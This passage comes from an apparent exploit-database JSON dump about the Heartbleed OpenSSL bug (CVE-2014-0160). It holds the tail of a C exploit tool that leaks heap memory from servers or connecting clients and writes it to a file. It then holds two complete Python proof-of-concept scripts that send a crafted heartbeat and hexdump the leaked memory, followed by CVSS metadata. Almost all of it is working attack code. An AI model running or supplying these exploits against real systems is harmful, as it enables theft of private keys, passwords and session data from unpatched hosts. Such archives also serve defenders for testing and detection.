if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\n enc_err = -1;\n }\n if(enc_err < 0){\n al=SSL_AD_BAD_RECORD_MAC;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\n goto apple;\n }\n if(s->expand != NULL){\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\n goto apple;\n }\n if (!ssl3_do_uncompress(s)) {\n al=SSL_AD_DECOMPRESSION_FAILURE;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\n goto apple;\n }\n }\n\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\n goto apple;\n }\n rr->off=0;\n s->packet_length=0;\n\tdtls1_record_bitmap_update(s, &(s->d1->bitmap));\n\tif(first==0){\n\t\tuint heartbleed_len = 0;\n\t\tchar* fp = s->s3->rrec.data;\n\t\t(long)fp++;\n\t\tmemcpy(&heartbleed_len,fp,2);\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\n\t\tfirst = 2;\n\t\tleakbytes = heartbleed_len + 16;\n\t\tprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\n\t}\n\tif(verbose==1){\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\n printf(\"\\n\");\n }\n\tleakbytes-=rr->length;\n\tif(leakbytes > 0){\n\t\trepeat = 1;\n\t}\n\telse{\n\t\trepeat = 0;\n\t}\n\tprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\n\tint output = s->s3->rrec.length-3;\n\tif(output > 0){\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\n\t if(first==2){\n\t\t\tfirst--;\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\t/* first three bytes are resp+len */\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\n\t\t}\n\t\telse{\n\t\t\t/* heap data & 16 bytes padding */\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\n\t\t}\n\t\tclose(fd);\n\t}\n\telse{\n\t\tprintf(\"[ nothing from the heap to write\\n\");\n\t}\n\n\t\t\tdtls1_stop_timer(c->sslHandle);\n\t\t\tc->sslHandle->tlsext_hb_seq++;\n\t\t\tc->sslHandle->tlsext_hb_pending = 0;\n\n\treturn;\napple:\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\n\tbadpackets++;\n\tif(badpackets > 3){\n\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\texit(0);\n\t}\n\treturn;\n}\n\nstatic DTLS1_BITMAP *\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\n {\n \n *is_next_epoch = 0;\n\n if (rr->epoch == s->d1->r_epoch)\n return &s->d1->bitmap;\n\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\n (rr->type == SSL3_RT_HANDSHAKE ||\n rr->type == SSL3_RT_ALERT))\n {\n *is_next_epoch = 1;\n return &s->d1->next_bitmap;\n }\n\n return NULL;\n }\n\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\n\t{\n\tint cmp;\n\tunsigned int shift;\n\tconst unsigned char *seq = s->s3->read_sequence;\n\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\n\tif (cmp > 0)\n\t\t{\n\t\tmemcpy (s->s3->rrec.seq_num,seq,8);\n\t\treturn 1;\n\t\t}\n\tshift = -cmp;\n\tif (shift >= sizeof(bitmap->map)*8)\n\t\treturn 0;\n\telse if (bitmap->map & (1UL<<shift))\n\t\treturn 0;\n\n\tmemcpy (s->s3->rrec.seq_num,seq,8);\n\treturn 1;\n\t}\n\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\n{\tint ret,sat,brw,i;\n\n\tif (sizeof(long) == 8) do\n\t{\tconst union { long one; char little; } is_endian = {1};\n\t\tlong l;\n\n\t\tif (is_endian.little)\t\t\tbreak;\n\n\t\tif (((size_t)v1|(size_t)v2)&0x7)\tbreak;\n\n\t\tl = *((long *)v1);\n\t\tl -= *((long *)v2);\n\t\tif (l>128)\t\treturn 128;\n\t\telse if (l<-128)\treturn -128;\n\t\telse\t\t\treturn (int)l;\n\t} while (0);\n\n\tret = (int)v1[7]-(int)v2[7];\n\tsat = 0;\n\tbrw = ret>>8;\n\tif (ret & 0x80)\n\t{\tfor (i=6;i>=0;i--)\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\n\t\t\tsat |= ~brw;\n\t\t\tbrw >>= 8;\n\t\t}\n\t}\n\telse\n\t{\tfor (i=6;i>=0;i--)\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\n\t\t\tsat |= brw;\n\t\t\tbrw >>= 8;\n\t\t}\n\t}\n\tbrw <<= 8;\n\n\tif (sat&0xff)\treturn brw | 0x80;\n\telse\t\treturn brw + (ret&0xFF);\n}\n\nstatic int\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\n\t{\n\tDTLS1_RECORD_DATA *rdata;\n\tpitem *item;\n\n\tif (pqueue_size(queue->q) >= 100)\n\t\treturn 0;\n\t\t\n\trdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\n\titem = pitem_new(priority, rdata);\n\tif (rdata == NULL || item == NULL)\n\t\t{\n\t\tif (rdata != NULL) OPENSSL_free(rdata);\n\t\tif (item != NULL) pitem_free(item);\n\t\t\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\n\t\treturn(0);\n\t\t}\n\t\n\trdata->packet = s->packet;\n\trdata->packet_length = s->packet_length;\n\tmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\n\tmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\n\n\titem->data = rdata;\n\n#ifndef OPENSSL_NO_SCTP\n\tif (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\n\t (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\n\t\tBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\n\t}\n#endif\n\n\tif (pqueue_insert(queue->q, item) == NULL)\n\t\t{\n\t\tOPENSSL_free(rdata);\n\t\tpitem_free(item);\n\t\treturn(0);\n\t\t}\n\n\ts->packet = NULL;\n\ts->packet_length = 0;\n\tmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\n\tmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\n\t\n\tif (!ssl3_setup_buffers(s))\n\t\t{\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\n\t\tOPENSSL_free(rdata);\n\t\tpitem_free(item);\n\t\treturn(0);\n\t\t}\n\t\n\treturn(1);\n\t}\n\n\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\n\t{\n\tint cmp;\n\tunsigned int shift;\n\tconst unsigned char *seq = s->s3->read_sequence;\n\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\n\tif (cmp > 0)\n\t\t{\n\t\tshift = cmp;\n\t\tif (shift < sizeof(bitmap->map)*8)\n\t\t\tbitmap->map <<= shift, bitmap->map |= 1UL;\n\t\telse\n\t\t\tbitmap->map = 1UL;\n\t\tmemcpy(bitmap->max_seq_num,seq,8);\n\t\t}\n\telse\t{\n\t\tshift = -cmp;\n\t\tif (shift < sizeof(bitmap->map)*8)\n\t\t\tbitmap->map |= 1UL<<shift;\n\t\t}\n\t}\n\n\nvoid usage(){\n\tprintf(\"[\\n\");\n\tprintf(\"[ --server|-s <ip/dns> - the server to target\\n\");\n\tprintf(\"[ --port|-p <port> - the port to target\\n\");\n\tprintf(\"[ --file|-f <filename> - file to write data to\\n\");\n\tprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\n\tprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\n\tprintf(\"[\t\t\t 0 = SMTP\\n\");\n\tprintf(\"[\t\t\t 1 = POP3\\n\");\n\tprintf(\"[\t\t\t 2 = IMAP\\n\");\n\tprintf(\"[ --loop|-l\t\t - loop the exploit attempts\\n\");\n\tprintf(\"[ --type|-t <n> - select exploit to try\\n\");\n\tprintf(\"[ 0 = null length\\n\");\n\tprintf(\"[\t\t\t 1 = max leak\\n\");\n\tprintf(\"[\t\t\t n = heartbeat payload_length\\n\");\n\tprintf(\"[ --udp|-u - use dtls/udp\\n\");\n\tprintf(\"[\\n\");\n\tprintf(\"[ --verbose|-v - output leak to screen\\n\");\n\tprintf(\"[ --help|-h - this output\\n\");\n\tprintf(\"[\\n\");\n\texit(0);\n}\n\nint main(int argc, char* argv[]){\n\tint ret, port, userc, index;\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\n\tint loop = 0;\n\tstruct hostent *h;\n\tconnection* c;\n\tchar *host, *file;\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\n\tprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\n\tprintf(\"[ =============================================================\\n\");\n static struct option options[] = {\n \t{\"server\", 1, 0, 's'},\n\t {\"port\", 1, 0, 'p'},\n\t\t{\"file\", 1, 0, 'f'},\n\t\t{\"type\", 1, 0, 't'},\n\t\t{\"bind\", 1, 0, 'b'},\n\t\t{\"verbose\", 0, 0, 'v'},\n\t\t{\"precmd\", 1, 0, 'c'},\n\t\t{\"loop\", 0, 0, 'l'},\n\t\t{\"help\", 0, 0,'h'},\n\t\t{\"udp\", 0, 0, 'u'}\n };\n\twhile(userc != -1) {\n\t userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index);\t\n \tswitch(userc) {\n \t\tcase -1:\n\t break;\n \t case 's':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\n\t\t\t\t\tif(h==NULL){\n\t\t\t\t\t\tprintf(\"[!] FATAL: unknown host '%s'\\n\",optarg);\n\t\t\t\t\t\texit(1);\n\t\t\t\t\t}\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(host==NULL){\n \t\t\t\tprintf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n \t\t\t}\n\t\t\t\tbreak;\n\t case 'p':\n\t\t\t\tif(iport==0){\n\t\t\t\t\tport = atoi(optarg);\n\t\t\t\t\tiport = 1;\n\t\t\t\t}\n \t break;\n\t\t\tcase 'f':\n\t\t\t\tif(ifile==0){\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(file==NULL){\n\t\t\t\t printf(\"[ error in malloc()\\n\");\n \t\t\t\texit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(file,\"%s\",optarg);\n\t\t\t\t\tifile = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 't':\n\t\t\t\tif(itype==0){\n\t\t\t\t\ttype = atoi(optarg);\n\t\t\t\t\titype = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'h':\n\t\t\t\tusage();\n\t\t\t\tbreak;\n\t\t\tcase 'b':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\n\t\t\t\t\tif(host==NULL){\n\t\t\t \t printf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n\t\t\t\t }\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n\t\t\t\t\tbind = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'c':\n\t\t\t\tif(iprecmd == 0){\n\t\t\t\t\tiprecmd = 1;\n\t\t\t\t\tprecmd = atoi(optarg);\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'v':\n\t\t\t\tverbose = 1;\n\t\t\t\tbreak;\n\t\t\tcase 'l':\n\t\t\t\tloop = 1;\n\t\t\t\tbreak;\n \t case 'u':\n\t\t\t\tudp = 1;\n\t\t\t\tbreak;\n\n\t\t\tdefault:\n\t\t\t\tbreak;\n\t\t}\n\t}\n\tif(ihost==0||iport==0||ifile==0||itype==0){\n\t\tprintf(\"[ try --help\\n\");\n\t\texit(0);\n\t}\n\tssl_init();\n\tif(bind==0){\n\t\tif (udp){\n\t\t\tc = dtls_client(ret, host, port);\n\t\t\tdtlsheartbleed(c, type);\n\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\twhile(repeat==1){\n\t\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\t}\n\t\t\twhile(loop==1){\n\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\tfirst=0;\n\t\t\t\trepeat=1;\n\t\t\t\tdtlsheartbleed(c,type);\n\t\t\t\twhile(repeat==1){\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\tret = tcp_connect(host, port);\n\t\t\tpre_cmd(ret, precmd, verbose);\n\t\t\tc = tls_connect(ret);\n\t\t\theartbleed(c,type);\n\t\t\twhile(repeat==1){\n\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t}\n\t\t\twhile(loop==1){\n\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\tfirst=0;\n\t\t\t\trepeat=1;\n\t\t\t\theartbleed(c,type);\n\t\t\t\twhile(repeat==1){\n\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tSSL_shutdown(c->sslHandle);\n\t\tclose (ret);\n\t\tSSL_free(c->sslHandle);\n\t}\n\telse{\n\t\tint sd, pid, i;\n\t\tif (udp) {\n\t\t\tc = dtls_server(sd, host, port);\n\t\t\twhile (1) {\n\t\t\t\tchar * bytes = malloc(1024);\n\t\t\t\tstruct sockaddr_in peer;\n\t\t\t\tsocklen_t len = sizeof(peer);\n\t\t\t\t\tif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\n\t\t\t\t\tdtlsheartbleed(c,type);\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\t\t\t\twhile(loop==1){\n\t\t\t\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\t\t\t\tfirst=0;\n\t\t\t\t\t\t\trepeat=0;\n\t\t\t\t\t\t\tdtlsheartbleed(c,type);\n\t\t\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\tret = tcp_bind(host, port);\n\t\t\twhile(1){\n\t \t\t\tsd=accept(ret,0,0);\n\t\t\t\tif(sd==-1){\n\t\t\t\t\tprintf(\"[!] FATAL: problem with accept()\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tif(pid=fork()){\n\t\t\t\t\tclose(sd);\n\t\t\t\t}\n\t \t\t\telse{\n\t\t\t\t\tc = tls_bind(sd);\n\t\t\t\t\tpre_cmd(ret, precmd, verbose);\n\t\t\t\t\theartbleed(c,type);\n\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t\t}\n\t\t\t\t\twhile(loop==1){\n\t\t\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\t\t\tfirst=0;\n\t\t\t\t\t\trepeat=0;\n\t\t\t\t\t\theartbleed(c,type);\n\t\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tprintf(\"[ done.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-08T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "EXPLOITPACK:596E856FF8E5B47CBB4EE985B0B99685", "href": "", "sourceData": "#!/usr/bin/python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\n\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\n\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\n\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\n\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \n\ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\n\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\n\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-09T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "EXPLOITPACK:BBA53240047E43646B744C9628FA5EFD", "href": "", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\n# Date: [2014-04-09]\n# Exploit Author: [Csaba Fitzl]\n# Vendor Homepage: [http://www.openssl.org/]\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\n# Version: [1.0.1f]\n# Tested on: [N/A]\n# CVE : [2014-0160]\n\n\n#!/usr/bin/env python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\n\nversion = []\nversion.append(['SSL 3.0','03 00'])\nversion.append(['TLS 1.0','03 01'])\nversion.append(['TLS 1.1','03 02'])\nversion.append(['TLS 1.2','03 03'])\n\ndef create_hello(version):\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01\n''')\n\treturn hello\n\ndef create_hb(version):\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\n\treturn hb\n\ndef hexdump(s):\n\tfor b in xrange(0, len(s), 16):\n\t\tlin = [c for c in s[b : b + 16]]\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\n\tprint\n\ndef recvall(s, length, timeout=5):\n\tendtime = time.time() + timeout\n\trdata = ''\n\tremain = length\n\twhile remain > 0:\n\t\trtime = endtime - time.time()\n\t\tif rtime < 0:\n\t\t\treturn None\n\t\tr, w, e = select.select([s], [], [], 5)\n\t\tif s in r:\n\t\t\tdata = s.recv(remain)\n\t\t\t# EOF?\n\t\t\tif not data:\n\t\t\t\treturn None\n\t\t\trdata += data\n\t\t\tremain -= len(data)\n\treturn rdata\n\n\ndef recvmsg(s):\n\thdr = recvall(s, 5)\n\tif hdr is None:\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\n\t\treturn None, None, None\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\n\tpay = recvall(s, ln, 10)\n\tif pay is None:\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\n\t\treturn None, None, None\n\tprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n\treturn typ, ver, pay\n\ndef hit_hb(s,hb):\n\ts.send(hb)\n\twhile True:\n\t\ttyp, ver, pay = recvmsg(s)\n\t\tif typ is None:\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\n\t\t\treturn False\n\n\t\tif typ == 24:\n\t\t\tprint 'Received heartbeat response:'\n\t\t\thexdump(pay)\n\t\t\tif len(pay) > 3:\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\n\t\t\telse:\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\n\t\t\treturn True\n\n\t\tif typ == 21:\n\t\t\tprint 'Received alert:'\n\t\t\thexdump(pay)\n\t\t\tprint 'Server returned error, likely not vulnerable'\n\t\t\treturn False\n\ndef main():\n\topts, args = options.parse_args()\n\tif len(args) < 1:\n\t\toptions.print_help()\n\t\treturn\n\tfor i in range(len(version)):\n\t\tprint 'Trying ' + version[i][0] + '...'\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tprint 'Connecting...'\n\t\tsys.stdout.flush()\n\t\ts.connect((args[0], opts.port))\n\t\tprint 'Sending Client Hello...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hello(version[i][1]))\n\t\tprint 'Waiting for Server Hello...'\n\t\tsys.stdout.flush()\n\t\twhile True:\n\t\t\ttyp, ver, pay = recvmsg(s)\n\t\t\tif typ == None:\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\n\t\t\t\treturn\n\t\t\t# Look for server hello done message.\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\n\t\t\t\tbreak\n\n\t\tprint 'Sending heartbeat request...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hb(version[i][1]))\n\t\tif hit_hb(s,create_hb(version[i][1])):\n\t\t\t#Stop if vulnerable\n\t\t\tbreak\n\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-01-03T21:23:15", "description": "This Metasploit module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable.", "cvss3": {}, 